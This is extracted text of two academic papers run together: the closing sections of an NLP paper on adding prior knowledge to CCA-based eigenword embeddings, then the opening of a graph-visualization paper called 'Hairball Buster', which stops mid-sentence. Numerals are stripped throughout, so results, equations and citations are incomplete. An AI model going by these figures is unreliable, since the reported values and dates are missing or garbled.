(note that the table is divided into distinct blocks, labeled a through i.) in gen- eral, adding prior knowledge to eigenword embed- dings does improve the quality of word vectors for the word similarity, geographic analogies and np bracketing tasks on several occasions (blocks d–f compared to last row in blocks a–c). for example, our eigenword vectors encoded with prior knowl- edge (ccaprior) consistently perform better than the eigenword vectors that do not have any prior knowledge for the word similarity task ( . , eigen in the first row under npk column, versus block d). the only exceptions are for α = . with word- net ( . ), for α = . with ppdb ( . ) and for α = . with framenet ( . ), where α denotes the smoothing factor. in several cases, running the retrofitting algorithm of faruqui et al. ( ) on top of our word embed- dings helps further, as if “adding prior knowledge twice is better than once.” results for these word embeddings (ccaprior+rf) are shown in table . adding retrofitting to our encoding of prior knowl- edge often performs better for word similarity and np bracketing tasks (block d versus g and block f versus i). interestingly, ccaprior+rf embeddings also often perform better than eigenword vectors (eigen) of dhillon et al. ( ) when retrofitted using the method of faruqui et al. ( ). for example, in the word similarity task, eigenwords retrofitted with wordnet get an accuracy of . whereas encoding prior knowledge using both cca and retrofitting gets a maximum accuracy of . . we see the same pattern for ppdb, with . for “eigen” and . for “ccaprior+rf”. we hypoth- esize that the reason for these changes is that the two methods for encoding prior knowledge maxi- mize different objective functions. the performance with framenet is weaker, in some cases leading to worse performance (e.g., with glove and sg vectors). we believe that framenet does not perform as well as the other lexicons be- cause it groups words based on very abstract con- cepts; often words with seemingly distantly related meanings (e.g., push and growth) can evoke the same frame. this also supports the findings of faruqui et al. ( ), who noticed that the use of framenet as a prior knowledge resource for improv- ing the quality of word embeddings is not as helpful as other resources such as wordnet and ppdb. we note that cca works especially well for the geographic analogies dataset. the quality of eigen- word embeddings (and the other embeddings) de- grades when we encode prior knowledge using the method of faruqui et al. ( ). our method im- proves the quality of eigenword embeddings. global picture of the results when comparing retrofitting to cca with prior knowledge, there is a noticable difference. retrofitting performs well or badly, depending on the dataset, while the re- sults with cca are more stable. we attribute this to the difference between how our algorithm and retrofitting work. retrofitting makes a direct use of the source of prior knowledge, by adding a regular- ization term that enforces words which are similar according to the prior knowledge to be closer in the embedding space. our algorithm, on the other hand, makes a more indirect use of the source of prior knowledge, by changing the co-occurence matrix on which we do singular value decomposition. specifically, we believe that our algorithm is more stable to cases in which words for the task at hand are unknown words with respect to the source of prior knowledge. 
This is demonstrated with the geographical analogies task: in that case, retrofitting lowers the results in most cases, since the city and country names do not appear in the sources of prior knowledge we used.

Further analysis. We further inspected the results on the word similarity tasks for the RG-65 and WS-353-ALL datasets. Our goal was to find cases in which either CCA embeddings by themselves outperform other types of embeddings, or in which encoding prior knowledge into CCA the way we describe significantly improves the results.

For the WS-353-ALL dataset, the eigenword embeddings obtain the highest correlation, with the multilingual word embeddings and skip-gram the next best performing. Interestingly enough, the multilingual word embeddings also use CCA to project words into a low-dimensional space using a linear transformation, suggesting that linear projections are a good fit for the WS-353-ALL dataset. The dataset itself includes pairs of common words with a corresponding similarity score. The words that appear in the dataset are actually expected to occur in similar contexts, a property that CCA directly encodes when deriving word embeddings.

The best performance on the RG-65 dataset is obtained with the GloVe word embeddings, with the CCA embeddings somewhat behind on that dataset. However, with this dataset we observe significant improvement when encoding prior knowledge using our method: using WordNet with this dataset improves the results considerably, and using the method of Faruqui et al. (with WordNet) on top of our CCA word embeddings improves the results even further.

The role of prior knowledge. We also designed an experiment to test whether using distributional information is necessary for having well-performing word embeddings, or whether it is sufficient to rely on the prior knowledge resource alone. In order to test this, we created a sparse matrix that corresponds to the graph based on the external resource, and then followed up with singular value decomposition on that graph, obtaining embeddings of the same dimensionality used earlier. The table below gives the results when using these embeddings. We see that the results are consistently lower than the results in the main results table, implying that the use of prior knowledge goes hand in hand with the use of distributional information. When using the retrofitting method of Faruqui et al. on top of these word embeddings, the results barely improved.

[Table: Results on the word similarity datasets (average over all datasets) and NP bracketing for word embeddings derived by using SVD on the similarity graph extracted from the prior knowledge source (WordNet, PPDB, and FrameNet).]

Related work. Our ideas in this paper for encoding prior knowledge in eigenword embeddings relate to three main threads in the existing literature. One thread focuses on modifying the objective of word vector training algorithms. Yu and Dredze, Xu et al., Fried and Duh, and Bian et al. augment the training objective in the neural language models of Mikolov et al. to encourage semantically related word vectors to come closer to each other. Wang et al. propose a method for jointly embedding entities (from Freebase, a large community-curated knowledge base) and words (from Wikipedia) into the same continuous vector space.
chen and de melo ( ) propose a similar joint model to im- prove the word embeddings, but rather than us- ing structured knowledge sources their model fo- cuses on discovering stronger semantic connections in specific contexts in a text corpus. another research thread relies on post-processing steps to encode prior knowledge from semantic lex- icons in off-the-shelf word embeddings. the main intuition behind this trend is to update word vec- tors by running belief propagation on a graph ex- tracted from the relation information in semantic lexicons. the retrofitting approach of faruqui et al. ( ) uses such techniques to obtain higher quality semantic vectors using wordnet, framenet, and the paraphrase database. they report on how retrofitting helps improve the performance of vari- ous off-the-shelf word vectors such as glove, skip- gram, global context, and multilingual, on vari- ous word similarity tasks. rothe and schütze ( ) also describe how standard word vectors can be ex- tended to various data types in semantic lexicons, e.g., synsets and lexemes in wordnet. most of the standard word vector training algo- rithms use co-occurrence within window-based con- texts to measure relatedness among words. sev- eral studies question the limitations of defining re- latedness in this way and investigate if the word co-occurrence matrix can be constructed to encode prior knowledge directly to improve the quality of word vectors. wang et al. ( ) investigate the no- tion of relatedness in embedding models by incor- porating syntactic and lexicographic knowledge. in spectral learning, yih et al. ( ) augment the word co-occurrence matrix on which lsa operates with relational information such that synonyms will tend to have positive cosine similarity, and antonyms will tend to have negative similarities. their vector space representation successfully projects synonyms and antonyms on opposite sides in the projected space. chang et al. ( ) further generalize this approach to encode multiple relations (and not just opposing relations, such as synonyms and antonyms) using multi-relational lsa. in spectral learning, most of the studies on in- corporating prior knowledge in word vectors focus on lsa based word embeddings (yih et al., ; chang et al., ; turney and littman, ; tur- ney, ; turney and pantel, ). from the technical perspective, our work is also related to that of jagarlamudi et al. ( ), who showed how to generalize cca so that it uses lo- cality preserving projections (he and niyogi, ). they also assume the existence of a weight matrix in a multi-view setting that describes the distances between pairs of points in the two views. more generally, cca is an important component for spectral learning algorithms in the unsupervised setting and with latent variables (cohen et al., ; narayan and cohen, ; stratos et al., ). our method for incorporating prior knowledge into cca could potentially be transferred to these algorithms. conclusion we described a method for incorporating prior knowledge into cca. our method requires a rela- tively simple change to the original canonical cor- relation analysis, where extra counts are added to the matrix on which singular value decomposition is performed. we used our method to derive word em- beddings in the style of eigenwords, and tested them on a set of datasets. our results demonstrate several advantages of encoding prior knowledge into eigen- word embeddings. 
Acknowledgements. The authors would like to thank Paramveer Dhillon for his help with running the swell package. The authors would also like to thank Manaal Faruqui and Sujay Kumar Jauhar for their help and technical assistance with the retrofitting package and the word embedding evaluation suite. Thanks also to Ankur Parikh for early discussions on this project. This work was completed while the first author was an intern at the University of Edinburgh, as part of the Equate Scotland program. This research was supported by an EPSRC grant and an EU H2020 grant (SUMMA).

Appendix A: Proofs

Proof of the Laplacian identity. The proof is similar to the one that appears in Koren and Carmel for the corresponding lemma; the only difference is the use of two views. Note that

[X^\top L Y]_{ij} = \sum_{k,k'} X_{ki} L_{kk'} Y_{k'j}.

As such,

[X^\top L Y]_{ij} = \sum_{k,k'} (n\delta_{kk'} - 1) X_{ki} Y_{k'j} = \sum_{k=1}^{n} n X_{ki} Y_{kj} - \left( \sum_{k=1}^{n} X_{ki} \right) \left( \sum_{k'=1}^{n} Y_{k'j} \right) = n \, [X^\top Y]_{ij},

where \delta_{kk'} = 1 iff k = k' and 0 otherwise, and the second equality relies on the assumption of the data being centered (so each of the two sums in parentheses equals 0).

Proof of the thin-SVD lemma. Without loss of generality, assume d ≤ d'. Let u'_1, \ldots, u'_d be the left singular vectors of A, v'_1, \ldots, v'_{d'} the right ones, and \sigma_1, \ldots, \sigma_d the singular values, so that A = \sum_{j=1}^{d} \sigma_j u'_j (v'_j)^\top. In addition, the objective equals (after substituting A):

\sum_{i=1}^{m} \sum_{j=1}^{d} \sigma_j \langle u_i, u'_j \rangle \langle v_i, v'_j \rangle = \sum_{j=1}^{d} \sigma_j \left( \sum_{i=1}^{m} \langle u_i, u'_j \rangle \langle v_i, v'_j \rangle \right).

Note that by the Cauchy-Schwarz inequality,

\sum_{j=1}^{d} \sum_{i=1}^{m} \langle u_i, u'_j \rangle \langle v_i, v'_j \rangle = \sum_{i=1}^{m} \sum_{j=1}^{d} \langle u_i, u'_j \rangle \langle v_i, v'_j \rangle \le \sum_{i=1}^{m} \sqrt{\sum_{j=1}^{d} |\langle u_i, u'_j \rangle|^2} \sqrt{\sum_{j=1}^{d} |\langle v_i, v'_j \rangle|^2} \le m.

In addition, note that if we choose u_i = u'_i and v_i = v'_i, then the inequality above becomes an equality, and the objective equals the sum of the m largest singular values, \sum_{j=1}^{m} \sigma_j. As such, this assignment to the u_i and v_i maximizes the objective.

Proof of the distance lemma. First, by the definition of matrix multiplication,

\sum_{k=1}^{m} (X u_k)^\top L \, (Y v_k) = \sum_{i,j} L_{ij} \left( \sum_{k=1}^{m} [X u_k]_i [Y v_k]_j \right).

Also,

\left( d^m_{ij} \right)^2 = \sum_{k=1}^{m} \left( [X u_k]_i^2 - 2 [X u_k]_i [Y v_k]_j + [Y v_k]_j^2 \right).

Therefore,

\sum_{i,j} -L_{ij} \left( d^m_{ij} \right)^2 = \sum_{i,j} -L_{ij} \left( \sum_{k=1}^{m} -2 [X u_k]_i [Y v_k]_j \right) + \sum_{i,j} -L_{ij} \left( \sum_{k=1}^{m} [X u_k]_i^2 + [Y v_k]_j^2 \right) = 2 \sum_{i,j} L_{ij} \left( \sum_{k=1}^{m} [X u_k]_i [Y v_k]_j \right),

where the term involving [X u_k]_i^2 + [Y v_k]_j^2 vanishes because of the definition of the Laplacian (its rows and columns sum to 0). Comparing this with the first equation of the proof gives the necessary result.

References

Eneko Agirre, Enrique Alfonseca, Keith Hall, Jana Kravalova, Marius Paşca, and Aitor Soroa. A study on similarity and relatedness using distributional and WordNet-based approaches. In Proceedings of HLT-NAACL.
Francis Bach and Michael Jordan. A probabilistic interpretation of canonical correlation analysis. Technical report, Department of Statistics, University of California, Berkeley.
Collin F. Baker, Charles J. Fillmore, and John B. Lowe. The Berkeley FrameNet project. In Proceedings of ACL.
Simon Baker, Roi Reichart, and Anna Korhonen. An unsupervised model for instance level subcategorization acquisition. In Proceedings of EMNLP.
Mohit Bansal, Kevin Gimpel, and Karen Livescu. Tailoring continuous word representations for dependency parsing. In Proceedings of ACL.
Mikhail Belkin, Partha Niyogi, and Vikas Sindhwani. Manifold regularization: a geometric framework for learning from labeled and unlabeled examples. Journal of Machine Learning Research.
Yoshua Bengio, Réjean Ducharme, Pascal Vincent, and Christian Janvin. A neural probabilistic language model. Journal of Machine Learning Research.
Jiang Bian, Bin Gao, and Tie-Yan Liu.
knowledge-powered deep learning for word embed- ding. in machine learning and knowledge discovery in databases, volume of lecture notes in com- puter science, pages – . avrim blum and tom mitchell. . combining la- beled and unlabeled data with co-training. in proceed- ings of colt. elia bruni, nam-khanh tran, and marco baroni. . multimodal distributional semantics. journal of arti- ficial intelligence research, : – . kai-wei chang, wen-tau yih, and christopher meek. . multi-relational latent semantic analysis. in proceedings of emnlp. jiaqiang chen and gerard de melo. . semantic in- formation extraction for improved word embeddings. in proceedings of naacl workshop on vector space modeling for nlp. shay b. cohen, k. stratos, michael collins, dean p. fos- ter, and lyle ungar. . spectral learning of latent- variable pcfgs: algorithms and sample complexity. journal of machine learning research. ronan collobert and jason weston. . a unified ar- chitecture for natural language processing: deep neu- ral networks with multitask learning. in proceedings of icml. scott deerwester, susan t. dumais, george w. furnas, thomas k. landauer, and richard harshman. . indexing by latent semantic analysis. journal of the american society for information science, ( ): – . paramveer s. dhillon, dean p. foster, and lyle h. ungar. . eigenwords: spectral word embeddings. jour- nal of machine learning research, : – . manaal faruqui and chris dyer. . improving vector space word representations using multilingual correla- tion. in proceedings of eacl. manaal faruqui and chris dyer. . non- distributional word vector representations. in pro- ceedings of acl. manaal faruqui, jesse dodge, sujay k. jauhar, chris dyer, eduard hovy, and noah a. smith. . retrofitting word vectors to semantic lexicons. in pro- ceedings of naacl. lev finkelstein, gabrilovich evgenly, matias yossi, rivlin ehud, solan zach, wolfman gadi, and ruppin eytan. . placing search in context: the concept revisited. acm transactions on information systems, ( ): – . daniel fried and kevin duh. . incorporating both distributional and relational semantics in word repre- sentations. in proceedings of iclr. juri ganitkevitch, benjamin van durme, and chris callison-burch. . ppdb: the paraphrase database. in proceedings of naacl. guy halawi, gideon dror, evgeniy gabrilovich, and yehuda koren. . large-scale learning of word relatedness with constraints. in proceedings of acm sigkdd. zellig s. harris. . co-occurrence and transforma- tion in linguistic structure. language, ( ): – . xiaofei he and partha niyogi. . locality preserving projections. in proceedings of nips. felix hill, roi reichart, and anna korhonen. . simlex- : evaluating semantic models with (gen- uine) similarity estimation. computational linguis- tics, ( ): – . eric h huang, richard socher, christopher d manning, and andrew y ng. . improving word representa- tions via global context and multiple word prototypes. in proceedings of acl. jagadeesh jagarlamudi and hal daumé. . regu- larized interlingual projections: evaluation on mul- tilingual transliteration. in proceedings of emnlp- conll. jagadeesh jagarlamudi, raghavendra udupa, and hal daumé. . generalization of cca via spectral embedding. in proceedings of the snowbird learning workshop of aistats. yehuda koren and liran carmel. . visualization of labeled data using linear transformations. in proceed- ings of ieee conference on information visualization. thomas k. landauer, peter w. foltz, and darrell la- ham. . 
an introduction to latent semantic analy- sis. discourse processes, : – . angeliki lazaridou, eva maria vecchi, and marco ba- roni. . fish transporters and miracle homes: how compositional distributional semantics can help np parsing. in proceedings of emnlp. tomas mikolov, kai chen, greg corrado, and jeffrey dean. a. efficient estimation of word represen- tations in vector space. in proceedings of iclr work- shop. tomas mikolov, ilya sutskever, kai chen, greg s cor- rado, and jeff dean. b. distributed representa- tions of words and phrases and their compositionality. in proceedings of nips. tomas mikolov, wen tau yih, and geoffrey zweig. c. linguistic regularities in continuous space word representations. in proceedings of naacl-hlt. george a. miller and walter g. charles. . contex- tual correlates of semantic similarity. language and cognitive processes, ( ): – . george a miller. . wordnet: a lexical database for english. communications of the acm, ( ): – . andriy mnih and geoffrey hinton. . three new graphical models for statistical language modelling. in proceedings of icml. shashi narayan and shay b. cohen. . optimizing spectral learning for parsing. in proceedings of acl. ankur p. parikh, shay b. cohen, and eric xing. . spectral unsupervised parsing with additive tree met- rics. in proceedings of acl. jeffrey pennington, richard socher, and christopher manning. . glove: global vectors for word rep- resentation. in proceedings of emnlp. kira radinsky, eugene agichtein, evgeniy gabrilovich, and shaul markovitch. . a word at a time: com- puting word relatedness using temporal semantic anal- ysis. in proceedings of acm www. sascha rothe and hinrich schütze. . autoex- tend: extending word embeddings to embeddings for synsets and lexemes. in proceedings of acl-ijcnlp. herbert rubenstein and john b. goodenough. . contextual correlates of synonymy. communications of the acm, ( ): – . carina silberer, vittorio ferrari, and mirella lapata. . models of semantic representation with visual attributes. in proceedings of acl. richard socher, john bauer, christopher d. manning, and andrew y. ng. . parsing with compositional vector grammars. in proceedings of acl. karl stratos, michael collins, and daniel hsu. . model-based word embeddings from decompositions of count matrices. in proceedings of acl. karl stratos, michael collins, and daniel hsu. . unsupervised part-of-speech tagging with anchor hid- den markov models. transactions of the association for computational linguistics, : – . peter d. turney and michael l. littman. . corpus- based learning of analogies and semantic relations. machine learning, ( - ): – . peter d. turney and patrick pantel. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research, ( ): – . peter d. turney. . similarity of semantic relations. computational linguistics, ( ): – . zhen wang, jianwen zhang, jianlin feng, and zheng chen. . knowledge graph and text jointly em- bedding. in proceedings of emnlp. tong wang, abdelrahman mohamed, and graeme hirst. . learning lexical embeddings with syntactic and lexicographic knowledge. in proceedings of acl- ijcnlp. chang xu, yalong bai, jiang bian, bin gao, gang wang, xiaoguang liu, and tie-yan liu. . rc-net: a general framework for incorporating knowledge into word representations. in proceedings of the acm cikm. dongqiang yang and david mw powers. . mea- suring semantic similarity in the taxonomy of word- net. in proceedings of the australasian conference on computer science. 
david yarowsky. . unsupervised word sense dis- ambiguation rivaling supervised methods. in proceed- ings of acl. wen-tau yih, geoffrey zweig, and john platt. . po- larity inducing latent semantic analysis. in proceed- ings of emnlp-conll. mo yu and mark dredze. . improving lexical em- beddings with semantic knowledge. in proceedings of acl. connections issue | vol. article | doi: . /connections- - hairball buster: a graph triage method for viewing and comparing graphs patrick allen,* mark matties and elisha peterson johns hopkins university applied physics laboratory, laurel, md. *e-mail: patrick.allen@jhuapl.edu abstract hairball buster (hb) (also called node-neighbor centrality or nnc) is an approach to graph analytic triage that uses simple calculations and visualization to quickly understand and compare graphs. rather than displaying highly interconnected graphs as ‘hairballs’ that are difficult to understand, hb provides a simple standard visual representation of a graph and its metrics, combining a monotonically decreasing curve of node metrics with indicators of each node’s neighbors’ metrics. the hb visual is canonical, in the sense that it provides a standard output for each node-link graph. it helps analysts quickly identify areas for further investigation, and also allows for easy comparison between graphs of different data sets. the calculations required for creating an hb display is order m plus n log n, where n is the number of nodes and m is the number of edges. this paper includes examples of the hb approach applied to four real-world data sets. it also compares hb to similar visual approaches such as degree histograms, adjacency matrices, blockmodeling, and force-based layout techniques. hb presents greater information density than other algorithms at lower or equal calculation cost, efficiently presenting information in a single display that is not available in any other single display. keywords graph analytic triage, node-neighbor centrality, standard canonical form for graphs, comparing graphs. purpose and overview the purpose of this paper is to describe a new method for analyzing relationships among nodes in a graph using a canonical representation that also enables comparison between different graphs. the approach is called ‘node-neighbor centrality’ (nnc), or more colloquially, ‘hairball buster’ (hb). hb computes a centrality measure (such as node degree) for a node and its neighbors, and presents this computation in an efficient, standardized visual form that scales to very large graphs. using the visual depiction of the measure, an analyst can quickly answer questions such as whether the graph is (generally) from a social network or a random graph. additionally, the depiction retains information about relationships, so an analyst can also quickly determine whether high-degree nodes are connected to each other directly or through a mutually adjacent node, such as in a bipartite graph. this paper presents examples of the hb approach addressing five types of analytic questions using four real-world data sets. hb is a canonical approach using node degrees that allows for comparison of different graphs, while extensions of hb include the display of selected graph attributes such as link weights. the use of alternative measures of centrality is also presented. the approach is compared and contrasted with other common graph algorithms. the paper concludes with the limitations of the hb approach and future planned features and applications. 
the hb python code is available at https://github. com/patallen /hairball-buster. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). hairball buster: a graph triage method for viewing and comparing graphs the need the most commonly used graph visualization techniques include node-link visualizations that embed a graph’s nodes and links in two-dimensional space, and adjacency matrix visualizations that show the entire space of possible connections in a large matrix. each of these techniques has a number of advantages and disadvantages (ghoniem et al., ). a particularly challenging case is graphs that have so many elements and interconnected features that it becomes difficult to determine which nodes and links are most ‘important.’ when using standard graph visualization algorithms such as force-directed (kamada and kawai, ; fruchterman and reingold, ) or dimensional reduction, the usual starting point is a depiction of all nodes and links. for many kinds of graphs, especially those with high connectivity, this results in a ‘hairball’ as shown in figure , which shows a link between every pair of jazz musicians that have performed together (gleiser and danon, ). the purpose of graph visualization is to help an analyst understand features of the graph or a particular node, using visual queries (freeman, ; peterson, ; ware, ). however, in this typical ‘hairball,’ it is difficult to determine at a glance the nodes with the highest degree, the distribution of nodes by degree, and whether the highest degree nodes are directly connected to each other. an analyst needs to apply a range of other algorithms to further dissect the graph, sometimes requiring multiple iterations, to determine how the various nodes relate to each other. in addition, there are a number of additional challenges that arise when visualizing graphs that change over time (bender-demoll and mcfarland, ; peterson, ). there is a tendency in force-directed visualization for nodes and links to reposition themselves, every time new nodes or links are added or removed. this makes it difficult not only to identify key nodes, but to track them over time. a number of approaches have been suggested, but they do not fully address the issue and are computationally expensive (bender-demoll and mcfarland, ; brandes and corman, ; moody et al., ; peterson, ; zweig, ). an alternative approach is the backbone layout, which attempts to directly resolve difficulties in visualizing particularly dense portions of a force- directed layout (lehmann and kottler, , nocaj et al., , ). figure shows the same data set using visone’s quadrilateral simmelian backbone layout. while the big hairball of figure has been broken up into four clusters, one large hairball has turned into several smaller hairballs. one still cannot answer many questions of interest to a data analyst, e.g. which nodes have the highest degree or how nodes of high degree are connected to each other. there is also an inherent performance cost when generating force-directed graph displays, most of which are at a minimum order n , where n is the number of nodes (fruchterman and reingold, ). because of the challenges in visualizing node- link diagrams in these cases, alternatives, such as an adjacency matrix visualization, are often proposed (sheny and maz, ). 
Adjacency matrices also can be a very effective way to visualize clusters, so they are often used when studying communities, sometimes referred to as clustering or blockmodeling (Wasserman and Faust; White et al.). In one study, the authors found that the adjacency matrix is almost always superior to the node-link diagram for a certain set of tasks (Ghoniem et al.). However, the authors did not include any large graphs in their study, and this is the principal drawback of adjacency matrix visualizations: they do not scale well to graphs with thousands or millions of nodes.

[Figure: Sample "hairball" showing jazz players that performed with each other.]

HB approach

HB is a new way of looking at graph data that scales effectively to large, dense graphs. The approach is simple to calculate and plot, and provides an easy way to identify by inspection the most connected nodes and most important links in the graph. Assume there is a graph with n nodes and m links. The degree of each node is the number of links connected to that node. (Throughout this paper, we will use degree as our primary measure of centrality, although HB representations of other centrality measures are presented later.) There are six steps to creating the HB plot, as follows:

1. Calculate the centrality (degree) of each node (which requires m calculations).
2. Sort the nodes by degree, assigning ranks from 1 (the highest degree node) to n (which requires n log n calculations).
3. Plot (in one color) the monotonically decreasing curve of degree (vertical axis) vs. node rank (horizontal axis). There will be n points on this curve, one for each node. Call this "the curve" and the nodes on it "curve nodes."
4. Calculate the neighbors of each node and place each neighbor on a list associated with each ranked node. (The placement of the neighbor on the list of neighbors for each node is accomplished during the initial m calculations in step 1.)
5. Store the degree of the neighbor with the neighbor node. (This step uses an index for each node so that the degree of the neighbor is an indexed look-up.)
6. For each node, plot (in another color) the value of each of its neighbors' degrees on the vertical line at the same horizontal position as that node, so that each of its neighbors will be represented above or below that node's position on the curve. Call these the "neighbor nodes."

Optional calculations, such as ensuring canonicalization and parallelization, and display options for log–log, semi–log, inverse, and same-degree offsets, are presented in section "Optional steps of the HB algorithm."

The computational efficiency of HB is on the order of m + n log n. In contrast, traditional graph displays that look like the hairball shown earlier require on the order of n² computation (Fruchterman and Reingold). In addition, some algorithms only sample the graph data set, while the HB approach deals with the whole data set in one pass (Squartini et al.). See section "HB measures of performance" for further details. In addition to computational efficiency, HB uses visual space more efficiently than an adjacency matrix, making it suitable for graphs of any size. It supports many of the same visual queries as an adjacency matrix, with the additional advantage that it can highlight not just a node's neighbors or clusters, but also how a node's centrality measure relates to those of its neighbors. In the remainder of this paper, these advantages are described in more detail by analyzing several real-world sample graphs.
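The six steps above translate almost directly into code. The following is a small illustrative Python/matplotlib sketch of the basic HB display (degree curve plus neighbor dots); it is not the authors' released implementation, and the edge-list format and variable names are assumed for the example.

```python
import matplotlib.pyplot as plt
from collections import defaultdict

def hb_plot(edges):
    """Draw a basic Hairball Buster plot from an undirected edge list."""
    # Steps 1 and 4: degrees and neighbor lists, built in one pass over the m edges.
    neighbors = defaultdict(set)
    for a, b in edges:
        neighbors[a].add(b)
        neighbors[b].add(a)
    degree = {v: len(ns) for v, ns in neighbors.items()}

    # Step 2: sort nodes by decreasing degree (n log n); break ties by label
    # so that the display is canonical.
    ranked = sorted(degree, key=lambda v: (-degree[v], str(v)))
    rank = {v: i + 1 for i, v in enumerate(ranked)}

    # Step 3: the monotonically decreasing degree curve (one dot per node).
    plt.scatter([rank[v] for v in ranked], [degree[v] for v in ranked],
                s=12, color="tab:blue", label="curve nodes")

    # Steps 5 and 6: for each node, plot its neighbors' degrees on the same
    # vertical line, above or below the curve node.
    xs, ys = [], []
    for v in ranked:
        for u in neighbors[v]:
            xs.append(rank[v])
            ys.append(degree[u])
    plt.scatter(xs, ys, s=4, color="tab:red", alpha=0.4, label="neighbor nodes")

    plt.xlabel("node rank (by degree)")
    plt.ylabel("degree")
    plt.legend()
    plt.show()

# Example usage with a tiny graph:
hb_plot([(1, 2), (1, 3), (1, 4), (2, 3), (4, 5)])
```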
first application: quickly identifying key nodes and relationships in a graph this section uses the jazz data set to illustrate how hb can answer common analytic questions about figure : visone backbone layout of jazz player data set. hairball buster: a graph triage method for viewing and comparing graphs which nodes have the highest degree and how these are connected to other types of nodes. figure depicts the degree curve (step , above). note that there are four very high-degree nodes in the upper-left-hand corner. the rest of the nodes follow a fairly linear path from upper left to lower right. (this pattern is typical for social networks.) figure displays the neighbors of the curve nodes (steps , , and above). each red dot represents one or more links on a traditional graph display. the dot’s vertical position indicates the node at one end of the link and its horizontal position indicates the node at the other end. for example, the red dot at coordinate ( , ) is the link between figure : sample hb curve for jazz players that performed with each other. figure : neighbors plot for jazz players that performed with each other. connections the first and second nodes on the curve (first two blue dots). this curve is not quite the same as a histogram or node-degree distribution, where one dot represents many nodes of the same degree. as with node- degree curves, the shape can be useful for comparing different graphs. however, hb displays one dot for each node, since the horizontal axis is the degree rank of the node. this is an important distinction, because hb retains connectivity information about individual nodes that other techniques do not and can therefore answer a much broader class of questions. it can also address additional questions that an adjacency matrix cannot, as will be summarized later. unlike the backbone layout display, the hb chart clearly shows which nodes have highest degree, how much higher their degree is than other nodes, whether the highest degree nodes are directly or indirectly connected to other high-degree nodes, and how high- degree nodes tend to connect to low-degree nodes. this is summarized in figure . for instance, using the hb visual for jazz players in figure , the top nodes are all clearly connected to each other (forming a fully connected subgraph), since there is a red dot on the same row and column as the three blue dots representing the eight highest degree nodes on the curve. for example, the highest degree node (rank , degree ) is connected to the second highest ranked node (rank , degree ), indicated by the red dots plotted at rank /degree and rank /degree . this pattern continues with the remainder of the top nodes. this specific kind of connectivity information cannot be determined from a backbone or a histogram display. second, the highest degree jazz players rarely performed with the lowest-degree jazz players, as shown by the gaps in the far side of the upper right quadrant, which increase in frequency and length as the rank increases to the right. this means that the number of lower-ranked musicians with whom the most connected musician performed is small. third, there are few dots near the bottom of the chart. this shows that jazz players who have performed with many others have tended to perform with other jazz players who have also performed with many others, and not with those who have performed with few. 
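One of the reading-off tasks just described, checking whether the top-ranked nodes are all directly connected to one another, can also be answered programmatically once degrees and neighbor sets are in hand. The short sketch below reuses the hypothetical neighbors/degree structures from the earlier example and is not specific to the jazz data set.

```python
from itertools import combinations

def top_nodes_fully_connected(neighbors, degree, k=8):
    """Return True if the k highest-degree nodes are all directly linked
    to one another (i.e., they form a fully connected subgraph)."""
    top = sorted(degree, key=lambda v: (-degree[v], str(v)))[:k]
    return all(b in neighbors[a] for a, b in combinations(top, 2))
```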
in general, the upper-left ‘quadrant’ or section of figure shows which high-degree nodes are mutually connected to other high-degree nodes. if some of the highest degree nodes are not connected with each other, this can indicate that there are different clusters of nodes around some of the high- degree nodes (an observation that can be made without running a clustering algorithm). conversely, if the highest degree nodes are mostly directly connected to each other, this provides a different pattern around a core group to analyze further. in the upper right and lower left quadrants, it is easy to see which high-degree nodes connect with lower-degree nodes and which do not. a high-degree node with many connections to one-degree nodes indicates a common star pattern on traditional graph displays. however, if one finds the highest degree nodes are connected to low-degree nodes rather than each other, then one may have a bipartite graph or other distinguishing feature. the lower right quadrant shows which lower- degree nodes connect with each other. if this area is sparse or empty, then the lower-degree nodes are only connecting with the higher-degree nodes. this is indicative of a star-like shape for some of the high- degree nodes. the visual can also be used to find nodes that are indirectly connected via an intermediate node. if two nodes a and b have a common neighbor c, then c will be depicted as a neighbor node on the same horizontal line above or below each of a and b. figure shows how the hb chart can appear for a directed graph. in this example, we randomly assigned a direction to the jazz player data set, where green indicates an ‘in’ link to the node in that row, while red indicates an ‘out’ link. the jazz player data set consisted of undirected links, and this figure just shows how directed graphs would appear if the links were directed. second application: quickly identifying core groups or multiple groups this section shows how hb can quickly determine whether there is a single core group or multiple core groups in a data set. this example uses toaster figure : questions addressed by location of neighbor nodes. hairball buster: a graph triage method for viewing and comparing graphs figure : sample directed neighbors plot for jazz player data set (green = in, red = out). (toster dot ru), which is a russian social media site for software support and help from a community of subject matter experts (smes). it is similar to the popular stackoverflow site, but the toaster data set is smaller and provides a form of ground truth in terms of user-provided tags for purposes of comparison. the toaster data have a set of threaded discussions where a person posts a question, someone else posts an answer (usually an sme), and then others can comment on both the question and the answer. the data set at the time of download had over , nodes, , , edges, and over , discussions. initial work by others at apl examined how to find figure : force-directed representation of the toaster data set. sub-communities within the larger community represented by the toaster data set. see figure for a traditional force-directed visualization of the toaster data set. this image definitely qualifies as a hairball! as shown in figure , the backbone layout did not produce more informative results. to apply the hb approach to this data set, we first removed duplications and focused entirely on whether any username in the data set communicated with any other username in the data set. 
the analytic question we are asking is ‘who are the core members, and are there any large communities with unique core members?’ while the original data set had , nodes and almost million edges, the de-duped data set had , nodes and , edges. figure shows the hb representation of the nearly , nodes. focusing on the highest-ranked nodes, the top can be readily identified, while the remaining are difficult to visually distinguish. each of the top-ranked nodes appears to connect to all the other high-ranked nodes, and the first obvious visual gaps occur at around , nodes. this indicates that the top-ranked nodes are either fully connected or very nearly fully connected. while displaying the full data set provides the information described above for the first nodes, it does not definitively indicate whether the highest degree nodes are fully connected, or whether they belong to separate clusters due to visual occlusion. to address this limitation, it helps to view the ‘inverse’ of the neighbors – that is, to display the connections figure : backbone layout representation of the toaster data set. figure : hb representation of the toaster data set (directionality ignored). missing links (the gaps), and to zoom in on the top nodes. (zooming in on the display adds no additional computational penalty beyond rendering.) when there are no dots in the inverse, the graph is fully connected. figure shows this inverse display zoomed in on the first nodes. it appears that the top nodes are almost, but not quite, fully connected. figure zooms in further on just the top nodes, again showing the ‘inverse’ neighbors. it is clear that nodes through are fully connected and that nodes through are almost fully connected. hairball buster: a graph triage method for viewing and comparing graphs figure : hb representation of the inverse of neighbor nodes (e.g. gaps). figure : hb inverse representation of just the top ranked nodes with each other in toaster data set. note that zooming in on the inverse neighbors was a simple way to gain a more definitive understanding of the graph while incurring virtually no additional computational cost. in summary, using our triage approach based on hb, we can quickly see that the top-ranked smes in the toaster data set have all commented on, or been commented on, by each other, and the top nearly so. this means that there is 